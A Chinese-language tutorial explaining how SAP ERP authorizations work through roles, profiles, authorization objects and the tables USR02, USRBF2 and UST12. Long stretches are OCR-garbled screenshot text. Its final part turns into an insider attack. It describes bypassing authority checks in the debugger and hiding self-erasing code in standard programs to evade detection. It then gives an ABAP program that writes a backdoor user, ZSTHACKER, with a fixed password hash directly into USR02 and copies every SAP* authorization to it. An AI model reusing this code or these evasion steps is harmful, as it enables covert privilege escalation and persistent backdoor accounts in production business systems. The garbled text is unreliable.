SAP權(quán)限設(shè)計簡介剖析

1、介紹小技巧 -ERP 權(quán)限控制 繁中求簡，閑聊一下SAP復(fù)雜權(quán)限設(shè)計的基本思想。特別是適合大集團業(yè)務(wù)的 ERP 系統(tǒng) , 應(yīng)該提供一個非常完善的權(quán)限控制機制 , 甚至允許將權(quán) 限控制字段細到字段級別，如果權(quán)限控制都做不到這點，估計產(chǎn)品銷售就夠嗆！多年以前，俺還在軟件幼稚園時，老師布置的權(quán)限作業(yè)，權(quán)限大概是設(shè)計的：Select 用戶名 From 用戶表 where 用戶名 ='butcher' （得到用戶名）select 權(quán)限組 ID From 權(quán)限表 where 用戶名 ='butcher' （得到用戶對應(yīng)的權(quán)限組 ID） select * From 權(quán)限控制列

2、表 where 權(quán)限組 ID = * '（得到?jīng)]個權(quán)限組 ID 對應(yīng)的明 細權(quán)限列表也就是用戶的明細權(quán) 限）這種簡單的權(quán)限設(shè)置是無法滿足復(fù)雜的業(yè)務(wù)需求的， 多年以后， 居然國內(nèi)還有很多軟件公司 在權(quán)限設(shè)計上還在玩這套小把戲。現(xiàn)在來看看“偉大的” SAP的權(quán)限設(shè)計思路，首先了解下幾個Tcode和權(quán)限相關(guān)表格。常用權(quán)限相關(guān) Tcode .（一）Role（角色）相關(guān) T-code:PFCG 創(chuàng)建ROLE_CM角色比較SUPC 批量建立角色 profile（二）建立用戶SU01 建立用戶SU01D 顯示用戶SU2|SU3| SU50|SU51|SU52改變 / 顯示用戶個人參數(shù)SU10|SU1

3、2 批量維護用戶SUCOM維護用戶公司地址SUIM 用戶信息系統(tǒng) （強調(diào)一下）（三）建立用戶組SUGR| SUGRD_NA維護用戶組SUGRD| SUGR_NA顯示用戶組（ 四）維護檢查授權(quán)SU20|SU21自定義授權(quán)字段和授權(quán)對象SU53 當出現(xiàn)權(quán)限問題可使用它檢測未授權(quán)對象 .SU56:分析 authoraztion data buffers.常用權(quán)限相關(guān)表格 :TOBJ : All avaiable authorzation objects.（ERP系統(tǒng)默認的所有授權(quán)對象 ）USR12: 用戶級 authoraztion 值USR02:User Logon Data（ 包括用戶名稱密碼

4、，是否鎖住等字段 ）USR03:User address dataUSR05:User Master Parameter ID（TcodeSU3可查看用戶參數(shù)文件的參數(shù)ID默認值）USR41:當前用戶（即Tcode SM04看到的所有當前活動用戶，包括各種對話系統(tǒng)通信類用戶 ） USRBF2: 記錄當前用戶所有的授權(quán) objectsUST04:User Profile master（ 用戶主數(shù)據(jù)中對應(yīng)的權(quán)限參數(shù)文件名 ）UST10S Single profiles（授權(quán)文件，權(quán)限參數(shù)和授權(quán)對象對應(yīng)表）UST12: Authorizations（具體授權(quán)細節(jié)）重點提示：USR02/USRBF2/

5、UST10S/UST1四個表包含的信息就是 ERP權(quán)限控制的關(guān)鍵，USR02是用戶主 數(shù)據(jù)表，后三表和用戶授權(quán)緊密相關(guān)。我現(xiàn)在舉一個 MM0健立物料主數(shù)據(jù)的實例，來說明SAP的權(quán)限控制設(shè)計思路，步驟如下：第一步：建立角色（Tcode: PFCGRolleRolleElmH hreibungZMM01建立物料角色設(shè)11爭務(wù)亠I摩 報鬆BerechtigungsworschiaQ 寸包角色菜單莎贛&二i 2ji滎單Q：創(chuàng)逹者 BenutzerPHJFU；Datum2Q07/05720-'Uhrzeit19:58:030用戶授權(quán)秦敕文件上的信息ProfilnameProfiltext

6、StatusT-C1550437角色於參數(shù)文件少MDIL要求參數(shù)文件比較維護授權(quán)數(shù)據(jù)和生底卷數(shù)丈件習(xí)更改挾取鶴弼Al1中，假設(shè)建立角色 ZMM011-12:在菜單Tab頁選擇“事務(wù)“加入MM01-：創(chuàng)建物料&你還可為程序，查詢這樣的 報表授權(quán)，選擇”其它“還能為數(shù)據(jù)倉庫等對象設(shè)置權(quán)限角色。1-345:到“權(quán)限“ Tab頁看到 系統(tǒng)自動產(chǎn) 生的授權(quán)參數(shù) 文件 ProfilnameT-C1550437，然后選擇”更改授權(quán)數(shù)據(jù) “，進入 圖2。角輒：權(quán)限“用QHfflfB曲岡|窈疋胡隠務(wù)1聞嗣礦窗虺譽戟口護：0來雄護的組圮級別ZKK010C0舊舊IB新交叉應(yīng)用枳限対掘 分黃艾檔童理料料譽理：

7、主站振XT'02 03 OftaI_IATE_IRK ACTVT1國00*已坨護 IEli標床標準 己堆護 己堆護 條改的棟摩 修譽的IF 己堆護 已堪護標淮 林準 已堆護苗 oc«國 00«E 00»烽改時 已推護 標準舊舊 舊 舊 IB 舊 舊 舊舊IH10生產(chǎn)計劃軻#4主戲折: 捋杠主數(shù)據(jù):莉#4寶歡據(jù): 抑科生列踞: 押料主戲據(jù)： 鉤料主戴據(jù): 啊料莖冀折; 將料主矽據(jù):空料圭彌據(jù)： 樣料圭救IE：B F 倉庫彳 客戶耳 wwd 輸料 莓卒a訓(xùn)謹軸IU 工廠OtJjektI_IATEJWC世舁圭斟據(jù)；工廠XTFefchamefERKS旻錄桂改艾尊物

8、料主致揭工廠創(chuàng)建翦生FRA1Inchidue Pteje enes OjotowwEkis顯然系統(tǒng)并不意味你給了建立物料的權(quán)限就能隨意使用該Tcode 了，系統(tǒng)有更嚴格的細致控制。圖2-12:我們可以看到建立物料主數(shù)據(jù)的權(quán)限分公司代碼層次，倉庫層次，物料類型 層次，銷售組織層次，物料組層次，和工廠層次等等，特別是對于象公司代 碼，銷售組織和工廠這樣的組織層次授權(quán)字段，控制點是非常必要的，一個 大集團實施ERP各公司代碼，各公司代碼下的各Plant授權(quán)用戶只能建立各自的物料，現(xiàn)在來看看是如何控制到工廠級別的。圖2-345:在每個控制級別（即權(quán)限控制字段）都分控制字段和作業(yè)，每個權(quán)限控制字段對應(yīng)一

9、個所謂的授權(quán)對象，工廠的授權(quán)對象是M_MATE_WR所有授權(quán)對象的作業(yè)統(tǒng)一都是 ACTVT包括01/02/03/06/08 五個作業(yè)，即控制是否允許創(chuàng) 建更改顯示刪除等。比如 MM01的作業(yè)只給03-顯示，則只能顯示物料。注:如果有特殊權(quán)限控制需要，可以使用 SU20|SU21自定義授權(quán)字段和授權(quán)對象圖2-67:點擊“工廠“，進去增加工廠權(quán)限，設(shè)置了工廠FRA1, FRA2和一個工廠范圍FRM1-FRM。注:如果公司代碼，物料類，物料組，工廠等授權(quán)字段選擇*表示允許輸入該字段所有的內(nèi)容。接下來，使用 SU01建立一個用戶假設(shè)名叫 butcher，然后在此將角色 ZMM0份配給它，如 圖3,記得

10、要做“用戶比較“知道該按紐變綠，這和人帶的帽子不同，在角色設(shè)置中，越綠 越好，至此，一個最簡單的權(quán)限設(shè)置就Ok 了，用戶butcher只能使用MM0在工廠FRA1,FRA1, FRM1 FRM2四個工廠上建立物料主數(shù)據(jù)。Rolle圖§RelleZOOl|SeschraltiLrig建立物料角巴設(shè)置攜述 口萊單垠小應(yīng)用人格化選揮£1Eienutzerzuordnungen圖4，圖5和圖6。現(xiàn)在來檢查USRBF2/UST10S/UST12三個和用戶授權(quán)相關(guān)的表格數(shù)據(jù)，如翠據(jù)制鱉豁 衰格UST13 選擇條冃 竝 數(shù)據(jù)瀟翌器表格USRBF2選擇茱目22播建A 0 B.E0酚 JT闔

11、凸忖圖凰麵凰表：丁£?1 俯 JJ表：UERBF2 三J被顯示的字段：5的5固定社目：殺顯示的字段：4的 4固定社目:客尸端權(quán)限知客尸端參數(shù)文件3|版本對彖權(quán)限4 J|3 稱對象1 二! 匚口 匚O口 1300800300300800800800800800300800800900aoo aoo300800300aoo800800300T-C1550437T-C1550437T-C1550437T-C1550437T-C1550437T-C1550437T-C1550437T-C1550437T-C15504377-C1550437T-C1550437T-C1550437T-C155

12、0437T-C1550437T-C1550437T-C1550437T-C1S50437T-C1550437T-C1550437T-C1550437T-C1550437T-C1550437A A A AA AA AA AA A A AA AA AA A A Ar u u c cC.N. n rr n it it N N « N n v n n sAENR ERV AENR RV1 DRAD OBJ KLAH EKL TCLA EKA .TCLS nwr JIATE.EUK JIATE.LGK JIATE-LCtf |ATB_UI IATE KAR IATE IAT KATE HEX

13、KATE HZP JIATE.NEU JIATE.STA JIATE.VKO JIATE_VKO HATE VCR IATE vrk TCODET-C155043700T-C155043700T-C155043700r-C155043700T-C155043700T-Cl 55043700T-C155043700T-Cl55043700T-C155043700T-C155043701T-C155043700T-C155043700T-C155043700T-C155043700T-Cl55043700T-C155043700T-C155043700T-Cl55043700T-C15504370

14、1T-C155043700T-C155D43700T-C1550437006*800300300BOO300800800800800800300300BOO900800 aoo aoo800800300300300BUTCHER BUTCHER BUTCHER BUTCHER BUTCHER BUTCHER BUTCHER BUTCHER BUTCHER BUTCHER BUTCHER BOCEER BCTTCHER BUTCHER BUTCHER BUTCHER BUTCHER BOTCHER BUTCHER BUTCHER BUTCHER BUTCHERC_AENR_BGR C_AEHR_

15、ERT c m C DRAD OEJ 0 KLAH BKL C TCLA BKA C TCLS HNT ffl MATE.BUE I_UTK_Lt3 I_IArE_LGa N_MATE_IAIf H_MATE_IAR Jfl NATE KAT H MATH IEI N NATE IIP N NATE NEU H MATE.STA ffl_MATE_¥EO ffl_MATE_iEO JIJIATE.IGR N KATE VRK 3 TCODET-C155043700T-C155043700T-C155043700T-C155043700T-C155043F00T-C155043700T

16、-Cl55043700T-C155043700T-C155043700T-C155043T01T-Cl55043700T-C155043700T-C155043700T-Cl55043700T-C155043700T-C155043700T-C155043700T-C155043700T-C155043T01T-C155043700T-C155043700T-C155043700圖4是用戶參數(shù)文件表 USR10S和用戶授權(quán)表USRBF2的合成圖。圖4-1346: UST10S表的參數(shù)文件 T-C1550437正是圖1-4中定義角色 ZMM01時生成的參數(shù)文件，對象表示的即授權(quán)對象，每個授權(quán)對象

17、對應(yīng)一個圖4-6的權(quán)限名稱 T-C155043700| T-C155043701，這倆權(quán)限名稱正是參數(shù)文件T-C1550437文件+系號。圖4-25:用戶授權(quán)對象表 USRBF2包含了 ERP用戶BUTCHERf對應(yīng)的（授權(quán)）對象和對 象對應(yīng)的權(quán)限名稱，現(xiàn)在注意一下USRBF2表用戶BUTCHE包含了工廠的授權(quán)對象M_MATE_WR其對應(yīng)的授權(quán)名稱是 T-C155043700 ,那么圖2-7設(shè)置 的四個工廠 FRA1, FRA1, FRM1 FRM2保存在什么地方呢？請見 圖6。為什么一個參數(shù)文件 T-C1550437產(chǎn)生了兩個 T-C155043700| T-C155043701 權(quán)限名稱呢

18、？ 查看權(quán)限對象設(shè)置時發(fā)現(xiàn)，在倉庫授權(quán)對象M_MATE_LG和銷售組織/分銷渠道授權(quán)M_MATE_ VKC下系統(tǒng)竟默認了 兩次相同的授權(quán)作業(yè)，如圖5。o未維護的血論綿別o丿TJT的豐枝,林和罡前IK: S曲代砰桝蚪主Xf!K； fePTHLE 0-0丄岸斤唯 ，-口 cce 即二忙 Etricp CC9 i » *5 的ttJfaI H拘壯主軸腐；下咋乂輛*4主尊II :冋岸日 V.創(chuàng)M11-ItLX曹霽CDnt i 秤壯主孫咋：檔和世N 構(gòu)M主*flM：糊：uw 14xt?!<： ffi t-mar的岀口琦*4至StfiL灌妁關(guān)餐憂光權(quán)ii'lS*nK T*?K；川護

19、妝主；再相主懿I辰館售蛆貯/分楙口二|軻*1生黔曙；伯代昭俺丿卄怕誓It業(yè)P悄榔刪帆 *齢佃i*“£> 80丿11尹白口 侍*;生旳播：軒將組聲齢訕仆.tLI少 4Wik創(chuàng)亙護審組給* n. iri 5L1 夕舟能堵道* I ,« a L? X圖5表示建立物料主數(shù)據(jù)的倉庫號和銷售組織/分銷渠道默認授權(quán)了兩次。虧® M S 0栓查表梅UST12被顯示的字段:7 列至數(shù)據(jù)瀏覽器二 表格 UET12選擇條目4*客戶端版本對象權(quán)限字段值300C_TCLS_MNTT-Cl 55043700AKLART001300C_TCLS_MNTT-C1550437QOASIGHT

20、豐800H KATE EUKT-Cl55043700A.ACTVT01800H KATE BUKT-Cl55043700ABUKRS2S31300M MATK LGUT-Cl55043700AACTVT01800N MATE LGNT-Cl55043700ALGNUM*800M MATE MANT-Cl55043700AACTVT01800M_MATE_MART-Cl55043700AACTVT01800lt_KATE_MAKT-Cl55043700AEEGRU半800K MATE MATT-Cl55043700AACTVT01300M MATE MATT-Cl55043700ABEGRU*3

21、00H MATE MEXT-Cl55043700AACTVT01800M MATE MZPT-Cl55043700AACTVT01800M MATE MZPT-Cl55043700AWERKSFRA1800M_NATE_NEUT-Cl55043700ADUMMY*800M-MATS-STAT-Cl55043700AACTVT01800H KATE STAT-Cl55043700ASTATffi300H KATE VKOT-Cl55043700AACTVT01800H MATE VKOT-Cl55043700AVKORG300M MATE VKOT-Cl55043700AVTWEG*800M M

22、ATE 昵RT-Cl55043700AACTVT01800M MATE 帕RT-Cl55043700ABEGRU*300 t 1M MATS TOKT-Cl55043700AACTVT01 2800M NATE WRKT-C1550437QOAACTVTOE800M MATE WRKT-Cl55043700AWERKSFRA1FRA 2 二300M MATE WFET-Cl55043700AWERKS300M MATS 幗KT-Cl55043700AWERKSFRM1FRI2800S TCODET-Cl55043700ATCDMM017的 1 固定欄日：圖6中，可以看到授權(quán)對象 M_MATE_

23、WR即工廠授權(quán)對象）有5條記錄，其中字段ACTVT有 01,06兩條,分表表示允許建立和刪除物料數(shù)據(jù) ,工廠 WERK有三條,正是FRA1,FRA2,和值 FRM1 到值 FRM2 女口圖 6-23。至此，權(quán)限設(shè)計的基本邏輯就非常清晰了，如果用戶BUTCHE要建立某工廠的物料，首先從授權(quán)表中查看是否有 M_MATE_WR的授權(quán)對象，然后再到 UST12去檢查輸入的工廠是否在授權(quán)范圍，If not so ，則提示未授權(quán)。現(xiàn)在用戶BUTCHER!立物料主數(shù)據(jù)，輸入工廠1000,提示M3 855未授權(quán)處理工廠 1000的主數(shù)據(jù)，如圖7。通常有兩種便捷方法查找到權(quán)限控制邏輯：（1）.SE91 輸入 M

24、3 855 查找，（2）.直接在物料主數(shù)據(jù)建立程序中查找，一定能看到該主程序的子程序下到處都有象圖7-4的 AUTHORITY-CHECK OBJECT 授權(quán)對象名稱ID ' ACTVT'作業(yè)允許號ID授權(quán)字段 FIELD'用戶輸入內(nèi)容“這樣的權(quán)限檢查邏輯。u化學(xué)工ZPCT 戒匕爼織口別1000組銀層次:LT庫存地點l-lA 濁:授權(quán)處理有天丁£竺0閑數(shù)拱Performance Ass石冋石鬲TiFrosramFound locs/short description LMGMKF03AUTHORITY-CHECK OBJECT 1 M MATE LGN* ID

25、 J ACT7TJ DUfflK?ID ? LONUMJ FIELD LGNUM,洎 J&號 M3B55 3JnLMGMMFOt7 iUTHORrTV-CHECK OBJECT ? M_MATE_VKO,TD J ACTVTJ DUMKYID J VKORG" FIELD VKORUID JFIELD VTWEG.如果你了解了這個原理，那么有跟蹤程序和修改變量的權(quán)限（對應(yīng)授權(quán)對象 S_DEVOP,02,只要你稍微熟悉ABAP實際上你就擁有了一切權(quán)限。下面的附件是一個使用跟蹤 /H并修改授權(quán)返回變量的操作手冊。跟蹤獲得權(quán)限操作.doc回顧這個實例，注意以下三點。1 .創(chuàng)建角色R

26、ole將產(chǎn)生一個授權(quán)參數(shù)文件Profiel Name 。2 . 一個授權(quán)參數(shù)文件包含許多授權(quán)對象Authority Objects,實際上是如果將多個Tcode或報表或起其它什么的賦予一個 Role,系統(tǒng)將這些Tcode（或報表）對應(yīng)的授權(quán)對象帶出 這些授權(quán)對象當然在 Tcode（報表對應(yīng)的）程序邏輯中會有體現(xiàn)，則角色對應(yīng)的授權(quán)參數(shù) 文件將包含這些授權(quán)對象。3 .授權(quán)對象通常有兩部分組成：一是作業(yè)ACTVT作業(yè)號分別是： 01創(chuàng)建或生成02更改03 顯示06刪除08顯示修改文檔二是授權(quán)字段，這些授權(quán)字段通常是諸如組織結(jié)構(gòu)層次的公司代碼，工廠，或其它比如物料類型，憑證類型等，這樣可以做到更細微的

27、權(quán)限控制。到現(xiàn)在為止,我們知道，實際上決定權(quán)限的是授權(quán)對象 Authorization Object !用戶的授權(quán) 對象表在USRBF中，所以只要往這個表插入數(shù)據(jù)就獲得了權(quán)限，現(xiàn)在可以使用SE38建立用戶和授予權(quán)限，這意味著使用ABA可以迅速獲得所有權(quán)限。不妨假設(shè)一下，一個 ABAPe在開發(fā)機上建立這樣的程序，然后傳輸?shù)缴a(chǎn)系統(tǒng)？Basis能發(fā)現(xiàn)？理論上，高明的ABAPer是不大可能被發(fā)現(xiàn)的，它可以將這段代碼甚至移值到一段很不常用的標準程序比如 Query， Report pain ter 產(chǎn)生的自動程序上，并且在程序中填加刪除 一切痕跡的代碼，甚至可以設(shè)置好自毀該段程序，繞過Access K

28、ey修改標準程序也是輕易的！下面的程序ZCRTUSE是建立用戶ZSTHACKER初始密碼123qaz)并賦予SAP*用戶的所有權(quán)限 的參考程序。Program ZCRTUSER.Data ZUSR02 like USR02 .*1.Create User ZSTHACKER accordi ng to DDIC select si ngle * into ZUSR02 from USR02 where BNAME = 'DDIC'.ZUSR02-BNAME = 'ZSTHACKER'.ZUSR02-Bcode = 'E3B796BB09F7901B

29、9;.in sert USR02 from ZUSR02 .*2.Copy Auth. Obj from SAP*(or other)*如果將Where BNAME = 'SAP*'去掉，基本就是復(fù)制所有的授權(quán)對象data ZUSRBF2 like USRBF2 occurs 0 with header line.select * from USRBF2 into table ZUSRBF2where BNAME = 'SAP*'.Loop at ZUSRBF2.ZUSRBF2-BNAME = 'ZSTHACKER'.Modify ZUSRBF2 INDEX sy-tabix TRANSPORTING BNAME. en dloop.INSERT USRBF2 FROM TABLE ZUSRBF2 ACCEPTING DUPLIC